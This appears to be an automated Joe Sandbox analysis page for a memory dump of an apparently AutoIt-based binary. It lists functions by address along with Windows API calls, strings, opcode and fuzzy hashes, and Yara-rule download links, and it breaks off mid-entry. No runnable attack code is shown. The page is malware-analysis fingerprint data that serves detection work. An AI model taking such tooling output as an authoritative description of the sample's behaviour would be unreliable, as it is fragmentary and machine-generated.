API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 640dd83a7a9a489acbaa5acf5c85e0d89d50e8eb0c00c3851ea0a71dfc351d40
Instruction ID: b905bdca283e892c32b5a8cbb6f2ec74a9951adc4b6a3dceceafeec9c4f03aed
Opcode Fuzzy Hash: 640dd83a7a9a489acbaa5acf5c85e0d89d50e8eb0c00c3851ea0a71dfc351d40
Instruction Fuzzy Hash: 8D115B36600109AFCF04FBA5CD56DEEB7B9EF04310B144065F506A72A2DB30AE04CB71

Function 00DB010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00DB45EC: __FF_MSGBANNER.LIBCMT ref: 00DB4603
Part of subcall function 00DB45EC: __NMSG_WRITE.LIBCMT ref: 00DB460A
Part of subcall function 00DB45EC: RtlAllocateHeap.NTDLL(01390000,00000000,00000001), ref: 00DB462F

std::exception::exception.LIBCMT ref: 00DB013E
__CxxThrowException@8.LIBCMT ref: 00DB0153

Part of subcall function 00DB7495: RaiseException.KERNEL32(?,?,00D9125D,00E46598,?,?,?,00DB0158,00D9125D,00E46598,?,00000001), ref: 00DB74E6

Strings

bad allocation, xrefs: 00DB0137

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: a325e00f465014b9e89a3a59fec6628ad2949d5282686d12ae2d7662d54a6baf
Instruction ID: cc6676842be498ce6e432aee80f7f3516c3562a3e5c8eb7f97ac8290266f36bb
Opcode Fuzzy Hash: a325e00f465014b9e89a3a59fec6628ad2949d5282686d12ae2d7662d54a6baf
Instruction Fuzzy Hash: 90F0AF7510831EE7CB19EAACDC029EF7BE8EF44390F140416F907E2182DBB08A8096B5

Function 00D9C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00D9C00E,?,?,?,?,00000010), ref: 00D9C627
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00D9C65F
_memmove.LIBCMT ref: 00D9C697

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: dc62c08e702e2669a3bef61fa906c9ebb510fffefaf58ab8248fb08b3c97feb6
Instruction ID: 255be38f0023b589c40c6968b2b54e55808f5702179201c7f93dd45637b9b0ff
Opcode Fuzzy Hash: dc62c08e702e2669a3bef61fa906c9ebb510fffefaf58ab8248fb08b3c97feb6
Instruction Fuzzy Hash: 8031F7B2205201ABDB249F78DC46B5BB7D9EF44350F14952EF95BC72A0EA32E8508771

Function 00D93A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(00D93C31), ref: 00D93A7D
SHGetPathFromIDListW.SHELL32(?,?), ref: 00D93AD2
SHGetDesktopFolder.SHELL32(?), ref: 00D93A8F

Part of subcall function 00D93B1E: _wcsncpy.LIBCMT ref: 00D93B32

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DesktopFolderFromListMallocPath_wcsncpy
String ID:
API String ID: 3981382179-0
Opcode ID: 76599db4c2d6dc28819a9add2cfbbf6415334088fbc9e2b0f048e818f729e9b0
Instruction ID: d0bc2bf8282f76dd04c8ce901f1b3fff969a9ca897143a412746b871038370eb
Opcode Fuzzy Hash: 76599db4c2d6dc28819a9add2cfbbf6415334088fbc9e2b0f048e818f729e9b0
Instruction Fuzzy Hash: 91214F76B00114ABCB14DF95DC84EEEB7BDEF88704B144094F50AE7251DB309E46CBA0

Function 00DB45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00DB4603

Part of subcall function 00DB8E52: __NMSG_WRITE.LIBCMT ref: 00DB8E79
Part of subcall function 00DB8E52: __NMSG_WRITE.LIBCMT ref: 00DB8E83

__NMSG_WRITE.LIBCMT ref: 00DB460A

Part of subcall function 00DB8EB2: GetModuleFileNameW.KERNEL32(00000000,00E50312,00000104,?,00000001,00DB0127), ref: 00DB8F44
Part of subcall function 00DB8EB2: ___crtMessageBoxW.LIBCMT ref: 00DB8FF2

Part of subcall function 00DB1D65: ___crtCorExitProcess.LIBCMT ref: 00DB1D6B
Part of subcall function 00DB1D65: ExitProcess.KERNEL32 ref: 00DB1D74

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

RtlAllocateHeap.NTDLL(01390000,00000000,00000001), ref: 00DB462F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 97559ad01ee9618153f6df7a992038bb6128c94c09606dcc0100995b8496e52b
Instruction ID: 401d35a5f3785782cdb1dc3ff6fce6ae4e4179c3d79ddc8b646b1ef61dc74f8b
Opcode Fuzzy Hash: 97559ad01ee9618153f6df7a992038bb6128c94c09606dcc0100995b8496e52b
Instruction Fuzzy Hash: 2A019235601301EEE624BB29AC42AEE3748EFC2762F15052AF9079B187DFB0DC40D674

Function 00D9E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00D9E646
DispatchMessageW.USER32(?), ref: 00D9E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E664

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 841c0fcae32a26b0966c8571e6084ea769ba81192fec295373acd6c5ef7c9c64
Instruction ID: 516fb4d2ebd60ae7bc20e16aaad57c39abc2aa03e6049d223ee1527442d2655a
Opcode Fuzzy Hash: 841c0fcae32a26b0966c8571e6084ea769ba81192fec295373acd6c5ef7c9c64
Instruction Fuzzy Hash: 71F01C726483459BDF20DBE18C45BABB3DDBB94740F584C2DF641D2080EBB4D4088B72

Function 00DA058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

CALL, xrefs: 00DA10DB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 2681bab069787e0d6f78547d136b27a279ff513fe73a651fd8e7e7ead6ee530a
Instruction ID: ec218616169fa5c19c3e48a2543c962ddff6f544e319eb978939df045cb49d92
Opcode Fuzzy Hash: 2681bab069787e0d6f78547d136b27a279ff513fe73a651fd8e7e7ead6ee530a
Instruction Fuzzy Hash: 60227F74508341CFDB28DF24C490A2ABBE1FF85304F18896DE99A9B361D775EC85CB62

Function 00D9131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00D916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00D91751

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D9159B
CoInitialize.OLE32(00000000), ref: 00D91612
CloseHandle.KERNEL32(00000000), ref: 00E058F7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 458326420-0
Opcode ID: 9b0c1819d2e9c8a09b8dc5c5396fb7802aa1d2fed4de52b1db384ac04b991c34
Instruction ID: aee3558644732c8619dbbeafc190fdf05ee8bb00ffe034f852f52562b1bddacc
Opcode Fuzzy Hash: 9b0c1819d2e9c8a09b8dc5c5396fb7802aa1d2fed4de52b1db384ac04b991c34
Instruction Fuzzy Hash: 2271CCB49053418EC708DF6BA891794BBA5F7893477946EEED02AB7361DBB0484CCF21

Function 00D94010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D9405A

Strings

EA06, xrefs: 00E057B9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: d243b5128fb36e7ef71698c3d24e929bc12dca7bf70de97904fd93f4794910d6
Instruction ID: a32ae8153c9af4c222c0a3ceff46ef434fec278f55527508a3cf4a886276a365
Opcode Fuzzy Hash: d243b5128fb36e7ef71698c3d24e929bc12dca7bf70de97904fd93f4794910d6
Instruction Fuzzy Hash: 51416B31A043549BCF159B6489A1FBF7FA2DB55300F284565EA86FB283D621CDC287B1

Function 00DE013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00DE01A9

Strings

0.0.0.0, xrefs: 00DE01B7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0
API String ID: 856254489-3771769585
Opcode ID: a46c9d3ae2e8111dd92018f30c031e968a6422fcbc0969092dfce291d9a70b4c
Instruction ID: cd4318a60cadfd501d38816d907f12015246be8a08cedba699d4c3a1b698f366
Opcode Fuzzy Hash: a46c9d3ae2e8111dd92018f30c031e968a6422fcbc0969092dfce291d9a70b4c
Instruction Fuzzy Hash: 7E11E035704308DFCB04EB65D992E69B3A9AF84710B148099F646EF391DAB0ED81CBB0

Function 00D93BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E03CF1

Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA

Part of subcall function 00D93A67: SHGetMalloc.SHELL32(00D93C31), ref: 00D93A7D
Part of subcall function 00D93A67: SHGetDesktopFolder.SHELL32(?), ref: 00D93A8F
Part of subcall function 00D93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D93AD2

Part of subcall function 00D93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E522E8,?), ref: 00D93B65

Strings

X, xrefs: 00E03D01

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Path$FullName$DesktopFolderFromListMalloc_memset
String ID: X
API String ID: 2727075218-3081909835
Opcode ID: c3643a0510daa02e121d27fd3a12eb3546e024feb2dd679177d9a104581a4398
Instruction ID: cb54c469c35e59604eae24a54fe0f52ed3f71a8a99d6d1d4b8fb572a35aeea28
Opcode Fuzzy Hash: c3643a0510daa02e121d27fd3a12eb3546e024feb2dd679177d9a104581a4398
Instruction Fuzzy Hash: 1D11CA71A00288ABCF05DFE4D8056DEBBF9EF45704F00800AE411BB281CBB45A498BB1

Function 00D934C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E034AA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID: >>>AUTOIT NO CMDEXECUTE<<<
API String ID: 1029625771-2684727018
Opcode ID: d30ab5718113fea2974b23d334bb9054dd6ebb7797a9e2d4a4d337f355a14033
Instruction ID: a503390be8e7045931a12d79e78697062fc05ab9b9462f6c96631bac9ddae99e
Opcode Fuzzy Hash: d30ab5718113fea2974b23d334bb9054dd6ebb7797a9e2d4a4d337f355a14033
Instruction Fuzzy Hash: 96F0FF75944209AA8F15EEB4D8919FFB7BCAE10314F108526B866A2182EB749B09DB31

Function 00DD6852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00DD685E,?,?,?,00E04A5C,00E2E448,00000003,?,?), ref: 00DD66E2

WriteFile.KERNEL32(?,?,",00000000,00000000,?,?,?,00E04A5C,00E2E448,00000003,?,?,00D94C44,?,?), ref: 00DD686C

Strings

", xrefs: 00DD6864

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$PointerWrite
String ID: "
API String ID: 539440098-357034475
Opcode ID: 9e9e78adccd79794a4695632b51a33fce172f59e508be519a5797cbc346f5552
Instruction ID: 35379eb5a59d19d71f97848af561ad4ea49b644b454aa04143d2411595a12ec5
Opcode Fuzzy Hash: 9e9e78adccd79794a4695632b51a33fce172f59e508be519a5797cbc346f5552
Instruction Fuzzy Hash: 5CE04636000218BBDB20AF94DC05FCABBB8EB08350F00451AF941A5110D7B1EA149BA0

Function 00DAF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61e6eea5268ab591bb52e7714effa13a7815440ef7c60ee8322ff0cf985a41f
Instruction ID: 6a5d4b25cd69200a58075e25a7afe48e0cbe90d939909dd32f30433c4d31cf9e
Opcode Fuzzy Hash: c61e6eea5268ab591bb52e7714effa13a7815440ef7c60ee8322ff0cf985a41f
Instruction Fuzzy Hash: 0051C5316043019FCB18EF68D491BAA77E5EF89314F04856DF99A9B2D2DB30E845CB71

Function 00DE8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DE8074
GetForegroundWindow.USER32 ref: 00DE807A

Part of subcall function 00DE6B19: GetWindowRect.USER32(?,?), ref: 00DE6B2C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$CursorForegroundRect
String ID:
API String ID: 1066937146-0
Opcode ID: 8a278740ccb7577900f408b930ff3b8bf5769d664b35ce7f518df9fd8895475b
Instruction ID: e673d5d2a20fd7269f8c884b6e6d4b30885e677d04d689b948ef9f58e52b40fa
Opcode Fuzzy Hash: 8a278740ccb7577900f408b930ff3b8bf5769d664b35ce7f518df9fd8895475b
Instruction Fuzzy Hash: 1D313B75A00208AFDF00EFA5CC81AEEB7B8FF14314F10442AE946A7251DB34AE45DBB0

Function 00D91DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E0DB31
IsWindow.USER32(00000000), ref: 00E0DB6B

Part of subcall function 00D91F04: GetForegroundWindow.USER32 ref: 00D91FBE

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Foreground
String ID:
API String ID: 62970417-0
Opcode ID: f739715dc1ba71e269a730bf01da09a5953fbdf61b9cd37bb98fbe7dd06cda7c
Instruction ID: 10f962c405d661a4ea95b7c3bde7b72acf96ed8a9cc03169586f1bc11add7c95
Opcode Fuzzy Hash: f739715dc1ba71e269a730bf01da09a5953fbdf61b9cd37bb98fbe7dd06cda7c
Instruction Fuzzy Hash: 51218C72600206AEDF11ABB5CC81BFE77AADF80788F014429F95A97181DA70EA059B70

Function 00DCE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DCE344
_strlen.LIBCMT ref: 00DCE34F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

